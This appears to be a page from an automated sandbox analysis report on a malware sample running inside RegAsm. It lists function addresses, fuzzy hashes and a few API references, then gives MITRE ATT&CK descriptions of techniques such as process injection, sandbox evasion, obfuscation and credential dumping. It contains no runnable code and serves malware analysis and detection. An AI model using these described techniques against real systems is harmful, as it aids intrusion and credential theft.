Instruction ID: 6c2276beaf566b9a9bdc1ff0447d0761e6db3ed1e3725ba86175889a0c87908a
Opcode Fuzzy Hash: a1afe4e88f9b97e7e8e8fd3cb907a0d95dd7110aea04d164d9c56f244693baaf
Instruction Fuzzy Hash: D5C16CB29087418FC360CF28DC96BABB7E1BF85318F09493DD1DAD6242D778A155CB0A

Function 0043D580 Relevance: .2, Instructions: 246COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 2f2405ba8501e732ea9b84d4f1d17a44deec420c9e3b37a34c35b376b07d1a00
Instruction ID: 64328250301a943c4221b3aea1d0af6b203cdad55f8ce28cbce5e8ab6c8a38f2
Opcode Fuzzy Hash: 2f2405ba8501e732ea9b84d4f1d17a44deec420c9e3b37a34c35b376b07d1a00
Instruction Fuzzy Hash: 1D812035A08310AFC7248F18D881A6FB7E2EF89314F14992DF9958B391DB35EC51CB86

Function 0041D9E0 Relevance: .2, Instructions: 240COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
Instruction ID: c9f1a56c5cc6f557c9c63b1b84e3a6a9080bfa3b27e02a379f5ce7dab310694a
Opcode Fuzzy Hash: 878cf165e9656de38300a8645f53e9724a1b6a64a083f1f7d23b351aa812f187
Instruction Fuzzy Hash: 75711673B499904BE328893C4C213AB6A830FD6230F2DC77AE5B68B3E5D5698C468345

Function 004393A0 Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6c1f2a911f0e81fcfb538e69c42d8226a7e147b8ce54a13b9f510f8c7205baf4
Instruction ID: e0a57f83dc16a7a8da3cda248db75e741f620206b22b691e391221bf57496f6d
Opcode Fuzzy Hash: 6c1f2a911f0e81fcfb538e69c42d8226a7e147b8ce54a13b9f510f8c7205baf4
Instruction Fuzzy Hash: B8616837B193105BD718CE69CC9066BB7D2ABCD320F09922EE995833D1CAB88C02C385

Function 0042F130 Relevance: .2, Instructions: 235COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
Instruction ID: 93e46a8bd3da194c47575791ec0c02f08c3a6f4472264f5d459ff5c5938f4a7b
Opcode Fuzzy Hash: 3c0d2c5577102dd58fbede460a656b1f00c5f7fe775d6732456b41350824bdc2
Instruction Fuzzy Hash: BF712827B49AA04BD318893C5C612A66AA30FD2330FEDC77FE9F1473D5D5694C0A8359

Function 004293AA Relevance: .2, Instructions: 206COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
Instruction ID: bd453bbf85e71c37a0fde588b6316f789c56ba706437bc4c9fe4a45325bf71d6
Opcode Fuzzy Hash: 2c0d35eb954a9d187377820dd095db1c7b0c4961e6edb85d2e315a33cbd56d54
Instruction Fuzzy Hash: 6771AF72D043689FEB25CFA9CD817DDBBB2FB80310F18816DD459AB289DB741946CB84

Function 0041E9B0 Relevance: .2, Instructions: 204COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
Instruction ID: 005a84f34606d807ef7803f473bdaa3d6e6b3e5a6c55ca812da06d8011db77a6
Opcode Fuzzy Hash: 5837d196803c6c41b2f90e1b684db958f269ba1b84df2d7f51245b5afb20183d
Instruction Fuzzy Hash: 19613839A0C3914FC325CF39C88095B7BE16F96314F4881AEECA54B392D639EC45D796

Function 004369A0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
Instruction ID: 79698480e789f394c927d8fe7c13ac859d6e499323d4242f8a9ce8e9df0e27f7
Opcode Fuzzy Hash: ff0b5ad84a3f607bb1e1ea8d3abea420a90813bc2cfe91ef12883cc8515d7bd3
Instruction Fuzzy Hash: 75516875608301ABD310AF65DC81B2BB7E5EB9A704F16A83EF58197281D7B8DC00DB96

Function 00435630 Relevance: .2, Instructions: 189COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
Instruction ID: c2a6bcafcd54fac281a485024f5f1ed9cd6e16fab59c4b6ddada49184fd56f0c
Opcode Fuzzy Hash: 9a456be5166b92ab10874784492d9a7357f7a85283333ec6aeb1257d6c9849aa
Instruction Fuzzy Hash: AB516BB15087548FE314DF29D49435BBBE1BBC8318F444A2EE4E987351E379DA088F86

Function 00430EF0 Relevance: .2, Instructions: 171COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
Instruction ID: d7cad542098786fb583f31be900ecfd8ec374eacf30312457ad000f908a343a7
Opcode Fuzzy Hash: c7e211e6c2eb9e6b08159abb43e9af5e1aa1d9e93aa804f146ff2ed9fa703b0b
Instruction Fuzzy Hash: 46512433A5A9D04BD32C853C4C623A66AD30BDA330F2DA77BE5B1CB3E1C56D88064355

Function 0042D57E Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
Instruction ID: 3e54edccfae4d99a9dc067fb7438e7a0f7318be64c596df77be4d10cba28c441
Opcode Fuzzy Hash: 20d0a7076ca4a073ae36702b2f035087ecf70489209c947b4e4cdcb3c897cb6e
Instruction Fuzzy Hash: E651A173B569104BC71CC93C9DA166AA6D3ABD933076E873DD476CB7D4EE78E8028600

Function 0043B068 Relevance: .2, Instructions: 162COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
Instruction ID: f3345cb18c34d22cea7c76b8972ea9c026089d6dd7aab1ac627898e589a0e88a
Opcode Fuzzy Hash: 80662d8b24bff6f8992e634c1a49b92d2c70a6d1023e3f7c4dc80169a6ede74d
Instruction Fuzzy Hash: 0E416676A687148FC328DF64DCC427BB2A2EBDA310F1E952D8AE61B354DB644D018689

Function 0042AE48 Relevance: .2, Instructions: 157COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
Instruction ID: 6458c2a36ad1cb1d3c56fad7511fb74c051b1bd8ee895f970e959f4703a01e69
Opcode Fuzzy Hash: a2cbd620310961616688d7e42db6707dedebd0210a3dd93db7e64ebc8315cc7a
Instruction Fuzzy Hash: 404117A02083D18BD7358F3990607B7BFD19FA3219F5948ADC6C597283D7784007C71A

Function 0042AE24 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
Instruction ID: df0643d0793dd6d859baae3aaafaf1000bf3a96435c36713bdd1cf9414b21aca
Opcode Fuzzy Hash: 305eeb4800ffca951eb0843350452d0362ef6350398f3d1306d62d3ed5eba46d
Instruction Fuzzy Hash: BE41B4A021C3D18BD7358B34A0607BBBBD09F93219F54599DC6D6A7283D7394407CB5E

Function 0043C020 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cd8906fdad29a51b8e9e884aeb17347e4e6cb46e2169fa8a0d26abd483c1d7b8
Instruction ID: bdc763d3058119611c7ecd8a8528ac1cd9b09ae5f9eb0b7e174c524916cf2ae7
Opcode Fuzzy Hash: cd8906fdad29a51b8e9e884aeb17347e4e6cb46e2169fa8a0d26abd483c1d7b8
Instruction Fuzzy Hash: 6A41F33A308610CFCB08CF78E9E055A73A2FBCB315F29847DD54547622C775A956CB44

Function 0043B05D Relevance: .1, Instructions: 118COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
Instruction ID: 78121dedb2d80148adf018004532891c25ca3ce7b5d6c479fa077a4fb261e508
Opcode Fuzzy Hash: 3aeefbf0a4d65d0b572efcb3e51add84d891666070d970ea2441e25f135985dc
Instruction Fuzzy Hash: 5C316879A587188FC328EF54E8C427BB3B0EB8B310F2E952D8AE51B350D7648D01878D

Function 0042ADF4 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
Instruction ID: eb231649460b60e8b645cff36354959ad8fc4f47b4bc3ecb8744b755d441be80
Opcode Fuzzy Hash: 184c9a32383a48190f2719d2aadad879d32520f34a2a0851a9020504aa8db94d
Instruction Fuzzy Hash: AC3191A02083E18BDB358F2491207FBBBE0AB93259F54499DC7D9A7683D7384017CB5E

Function 0040D7A2 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
Instruction ID: 608a5c001c9016f47e6d849a3a7bf8eb37f8ca910ed307557679ae7e480cd3ab
Opcode Fuzzy Hash: 62a00dcf07fbe0f00a8a7fc944f1fa53c40aca6aac618530027c831a6d815f71
Instruction Fuzzy Hash: 9F31F139E146009AE325AB598C807377753FBC7300F68D13EE092A32E9DA38AC16874D

Function 0043B9A1 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
Instruction ID: 4f1d9a8e55b01d87ed81b452fa3618ff49b1b83c19e4b1c484c24ed6b64955da
Opcode Fuzzy Hash: 9112804f8139e9297ba88e3742caefcf6529a162b57808c6ac39dfffa7ef667e
Instruction Fuzzy Hash: 78212921718B550BD728DE3988D132BF7D39BCB210F48D63EC5938B2D6CA34D9054688

Function 0043BF40 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
Instruction ID: c284272cbe1354c2bac86839248cf07ee5637eab11ef42c9faf85a1953e6744e
Opcode Fuzzy Hash: 07c084c6a51b414f3b431d0e7c9dd3fa60a135cddecbb542077b91dc3dbce620
Instruction Fuzzy Hash: B521217AA08225CFCB04DF24E88466AF3A0FF4A714F5A947ED5858B241D3309E90CF86

Function 00402BD0 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
Instruction ID: d3efd499d3fbc33036e2032367fc91d0155dae543bbe3474a39f1f7b468c3dc9
Opcode Fuzzy Hash: d6c3b5f98540c4edbfb2bfe1cd8306b70007439d23ccf1357e9be793c2fe8105
Instruction Fuzzy Hash: 4A11B273F2A92107F3549E369C9C21B6352E7C531471A0535D941A72C1CA79F902E168

Function 0043B195 Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
Instruction ID: 20ca1e341728769f683a14c7d19e02f3155232ce684509dc4d83bd4e8ff0b8df
Opcode Fuzzy Hash: 44c97935eddf75c305e2d2b65cd8ba00c8eb118628fa0640b3156059a25bc93e
Instruction Fuzzy Hash: 72112575A587048FC318EFA4ACC837BB3A4EB8A311F29953D86A647350DB608D118689

Function 00433630 Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction ID: b28cf3c768fcd90dd8a03dd2320e21e507999ec1ebf4a65f37eb71fdd5601da6
Opcode Fuzzy Hash: 3e517b76c81f2f0a6076fdce7dc782eea2d3cbf91ba42ade49569ad1c1c074a0
Instruction Fuzzy Hash: E011EC336051D41EC3268D3C8400565BF930AA7636F5953DAF4B49B3D2D52A8E8A8759

Function 004299B0 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
Instruction ID: 55029b9e38fdfb0df3b4b8151af6569af59bc0d0f5a25f3444c4cc7de86b0466
Opcode Fuzzy Hash: d722c01a8bd2e68c804006294bc8a0889be745f601f03f4d9d5de63ddc943046
Instruction Fuzzy Hash: E001B1F1B0035257DB209F55B4C1B27B2A86F95718F08443EE80867342DB7DFC44C2AA

Function 0040E83B Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction ID: 78b4a12427cc173d586094b37f3e700b38d0ff2ce6b24877113fcbe6adf3e26f
Opcode Fuzzy Hash: 009d4c94d368716b5c6a07810fd56c9ecea920436c5469bb2fcdecc493a6d2d4
Instruction Fuzzy Hash: D71127717507404FD3189F25CCD2A637772ABC6314705893DB8519BBD3C67CAC0587A8

Function 0040BDC9 Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction ID: 5bf83162093d809aa6a095f83f940cb60b386281fae2fad957a8694bd2eb5c71
Opcode Fuzzy Hash: 9189c4c3175398eb84fc80681e1c6dfaa05d9782f835bdc2878a97ad02b88055
Instruction Fuzzy Hash: 3911E071608341ABD7149F29DD9067FBBE2EBC2354F14AE2CE59253790C630C841CB4A

Function 0042526A Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction ID: 26823722f3a6afcc10447d79cbf8b06261be6e3c3bcefc34e32834821d37eed0
Opcode Fuzzy Hash: fd5a1a9362cca19039c8d3fa2776169205ee0034e021f5660f97d99573220aa2
Instruction Fuzzy Hash: D4F0EDB5A88301BAF6248A00DD43F67B6A89755B04F301519B344790E1E5E1F559870E

Function 0043AAB2 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction ID: fe1efda9bcc16308283c5424634e62067ac2dc8fe4a9505e7820fcb65e305570
Opcode Fuzzy Hash: 130b8f035e0f9caf36d69ffe2fe00e5717c81f35e5d13109d0f780a603360f32
Instruction Fuzzy Hash: B1F0A735B456808BE704CF38D82155BBBE2E38B324F185A7DD681D3751D639C8018609

Function 0042F83B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 0042F845
VariantInit.OLEAUT32 ref: 0042F858

Strings

L, xrefs: 0042F8DA

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: Variant$ClearInit
String ID: L
API String ID: 2610073882-2909332022
Opcode ID: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction ID: 6db3269f84c82bd33a71f1d72ed2fa7cb36160b769e4d9c9dbaa52e299ac7a35
Opcode Fuzzy Hash: 27f71955ec06eb12b5b306dc881331dba57b9c572ded71c52751796e6aae7b46
Instruction Fuzzy Hash: 40413A7110CBC18ED321DB38844865EBFE16BE6220F588AADE5E5873E2D674854ACB53

Function 004322BB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 004322EE
GetSystemMetrics.USER32 ref: 004322FD

Strings

, xrefs: 004323A8

Memory Dump Source

Source File: 00000007.00000002.4205744963.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction ID: c9a1f8c58fc854c7343cd62f2f50c2794f568aca7ada01e3bbf97962732916ca
Opcode Fuzzy Hash: c208063e004baaaa8ceb91fa553bdd71456cfb1a6ec307733573892fb2cdbb50
Instruction Fuzzy Hash: BB3183B09143048FDB40EF69E98965EBBF4BB88304F01853EE499DB360D7749948CF86

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
